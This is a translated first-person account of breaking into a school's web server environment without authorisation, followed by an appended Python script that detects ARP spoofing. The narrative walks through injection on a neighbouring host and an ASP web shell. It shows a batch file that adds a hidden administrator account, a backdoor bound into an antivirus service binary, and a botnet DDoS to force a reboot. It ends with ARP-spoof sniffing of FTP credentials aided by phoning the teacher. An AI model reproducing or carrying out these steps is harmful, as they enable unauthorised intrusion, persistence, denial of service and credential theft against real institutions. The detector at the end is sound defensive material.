Recently PPMM (a pretty girl) was cajoling me in a McDonald's to test her school website's security for her. I thought, that school is only about ten minutes from here, so I agreed. I did not expect... What follows is the beginning; to avoid unnecessary trouble, sensitive information has been removed.

C:\>ping www.*.com
Pinging www.*.com [218.*.96.39] with 32 bytes of data
Reply from 218.*.96.39: bytes=32 time=687ms TTL=107

A sweep with X-Scan v3.2 turned up no system vulnerabilities; the site had ports 21, 80 and 1433 open. I went through the website to collect some information on the webmaster and the teachers. PPMM saw me hunting for nothing but people's mailboxes, QQ numbers and net names; when MM heard that I wanted this information to build a dictionary, she also supplied some personal details about the teacher who manages the site, such as salary, marital status, how many girlfriends, how big the cat at home is, #￥%...#%#￥. After collecting it I built a dictionary by hand and hung it on the scanner to see if a weak password would fall out, which would make a lot of things convenient. Khan~~ Not a single one came out; N hundred words of failed test results omitted.

OK, let's summarize what we have: the site has lots of ASP pages but none is injectable; there is a guestbook but I couldn't get its database out, and its character filtering is very strict; FTP version unknown; a download system that looks like their own code; overall an ASP+MSSQL+Windows 2000 site. Seeing that my luck today was really this good, MM said "the server is secure", and I was happily about to call it a day. Only to hear MM say: "today, if you can't make this server unsafe, you're the one who's unsafe..." Scared, I had to continue. Since the server itself wasn't giving, maybe the same network segment had a vulnerable host, and from there I could sniff some sensitive information out of the target server! Tracert showed the gateway routing information; I took SuperScan 3.0 and scanned the 218.**.96.39/24 segment, sweeping only ports 21, 80 and 1433, as shown in Figure 1.

Oh, much better! I just picked one IP, took Veteran's "virtual site query tool" and looked at its 125 sites, then used Bright Boy's WEB integrated testing program to batch-scan for injection points.

One cigarette later the results were out: there were N injectable sites (N<10), as in Figure 3.

While using SuperScan to scan this host's open ports, I found that besides the ports above the server also had 3389 open. Good, let's go with this station ^Q^. I casually took one injectable link to test, and waited... one cigarette, and the result finally came out, Figure 4!

Username: henry2006, password: 12142006, admin login address: http://www.*.com/admin/admin_m.asp. The backend isn't big, but it has a database backup, which is enough. I submitted an advertising entry containing an encrypted "image", and in the backup turned it into asp. After logging in, net start ran, so it didn't look like he had restricted CMD.EXE's execute permissions; looking further, apart from drive C the other drive letters might be Everyone Full Control. On drive D I saw the target, D:\rising\rav\. Oh, this is our lovely Rising! But nothing to get too happy about, because replacing this service to elevate privileges would require a server restart, so no hurry; first see whether there is anything else. In the little trojan shell I entered c:\winnt\system32\inetsrv\data\ to see whether I could jump into this directory; by default it is Everyone Full Control. As shown in Figure 5:

Path error, or disk full, or no permission to access! Next I looked at Serv-U's default installation directory, which also failed... N tests omitted. I had to use this Rising service to elevate privileges. First copy CCenter.exe into the WEB directory and download it to the local machine, then build a batch file with the following statements:

@echo off
net user destiny 123%&$%FSDFh /add
net localgroup administrators destiny /add

Then take a file binder, bundle the downloaded CCenter.exe, the batch file and a small backdoor together, upload it, and replace the other side's CCenter.exe with our own CCenter. Now we only need the other side's machine to reboot, and our batch file and backdoor will run! Given how unstable Windows is, the host reboots once every few days. I'm very careful when I hack a site, and DDoSing the host would spook him. I sneaked a glance at MM standing beside me: at some point she had put on the boxing gloves I keep as decoration, and I didn't dare ask her to wait a few days. Fine, my broilers are strong enough, so I had to D the server. In the time it took to go out and buy a pack of cigarettes, the server was down.

After logging in over 3389 we need to pass two pieces of software: open an FTP on our own machine and transfer winpcap and arpspoof to the server. winpcap is the driver used for sniffing; arpspoof is a small ARP spoofing tool that a big cow recently modified, so its functions are strong and its error probability is lower. ARP spoofing is an antique-level technique and there is plenty of material online; I'll just say briefly how ARP spoofing works. We just tracerted the gateway, 218.*.96.254, and the target host is 218.*.96.39, so we only need to fool 218.*.96.254 and 218.*.96.39. That is, tell 218.*.96.254 that 218.*.96.39's MAC address is my own (218.*.96.45); then tell 218.*.96.39 that 218.*.96.254's MAC address is my own (218.*.96.45). This way all packets are sent to 218.*.96.45, and 218.*.96.45 does the forwarding. The basic syntax is: ArpSpoof [Spoof IP1] [Spoof IP2] [Own IP], where Spoof IP1 and Spoof IP2 are the IP addresses you want to deceive and sniff, and Own IP is your own IP address; note that all three IPs must be on the same network segment, not across a router.

arpspoof.exe 218.*.96.254 218.*.96.39 218.**.96.45 21 c:\boot.txt

Now there is only one thing to do, and that is wait for the other side's admin to log in with FTP... Running it from the command line is easily discovered by the administrator, but MM said she had a way to get the admin to log in within 10 minutes; she called it "steal + desperate measure", which I see as a "honey trap". I don't know what she said to the teacher on the phone, but in about half an hour I had an FTP account, with very big permissions; escalating from there was nothing difficult. By the time I wanted to continue elevating privileges, the mouse was no longer in my hands, and MM was off showing off my "fruits of labour".

PostScript: in less than 20 minutes, two servers' worth of permissions vanished in the sound of MM's showing off. This intrusion used no new technology, just a composition of a few tools; the sniffing is also technology from a few years ago, but this sniffer is very simple and does not work on a layer-three switched network or for sniffing across routes; the success rate of sniffing across routes is very low, for a side dish like me still less than one in ten. I hope this article can be the brick that attracts jade.
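Detection counterpart to the ARP poisoning the article describes, as an added example that is not part of the original article: a small Python monitor over a constructed capture of ARP replies that flags the two signatures this scheme leaves on the wire, an IP whose MAC changes and one MAC answering for several IPs. The 218.0.96.x addresses and MACs are constructed stand-ins for the page's redacted values.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    ts: int          # seconds since capture start
    sender_ip: str   # IP address the reply speaks for
    sender_mac: str  # MAC address it claims that IP has


# Constructed stand-ins for the page's redacted 218.*.96.x hosts.
GATEWAY_IP, TARGET_IP, ATTACKER_IP = "218.0.96.254", "218.0.96.39", "218.0.96.45"
GATEWAY_MAC, TARGET_MAC, ATTACKER_MAC = (
    "00:11:22:aa:aa:01", "00:11:22:bb:bb:39", "00:11:22:cc:cc:45")

# Constructed capture: three legitimate replies, then the two poisoning replies the
# article describes (gateway and target both "become" the attacker's MAC).
SAMPLE_REPLIES = [
    ArpReply(0, GATEWAY_IP, GATEWAY_MAC),
    ArpReply(1, TARGET_IP, TARGET_MAC),
    ArpReply(2, ATTACKER_IP, ATTACKER_MAC),
    ArpReply(60, GATEWAY_IP, ATTACKER_MAC),  # tells the target ".254 is me"
    ArpReply(60, TARGET_IP, ATTACKER_MAC),   # tells the gateway ".39 is me"
    ArpReply(62, GATEWAY_IP, ATTACKER_MAC),  # repeated poison, must not re-alert
]


def detect_arp_spoof(replies, trusted=None):
    """Return alert strings for (a) an IP whose MAC differs from its trusted or
    first-seen value and (b) one MAC speaking for more than one IP.
    `trusted` is an optional {ip: mac} table, e.g. the gateway's static entry."""
    ip_to_mac = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    mac_to_ips = defaultdict(set)
    alerts = []
    for r in replies:
        mac = r.sender_mac.lower()
        known = ip_to_mac.get(r.sender_ip)
        if known is None:
            ip_to_mac[r.sender_ip] = mac
        elif known != mac:
            alerts.append(f"t={r.ts}: {r.sender_ip} moved from {known} to {mac}")
            ip_to_mac[r.sender_ip] = mac  # alert once per change, not per repeat
        if r.sender_ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(r.sender_ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append(f"t={r.ts}: {mac} now claims {sorted(mac_to_ips[mac])}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoof(SAMPLE_REPLIES, trusted={GATEWAY_IP: GATEWAY_MAC}):
        print(line)
```

On a real segment the same checks run over replies pulled from a capture or from periodic reads of the ARP cache; seeding `trusted` with the gateway's real MAC catches a poison that arrives before any legitimate reply has been seen.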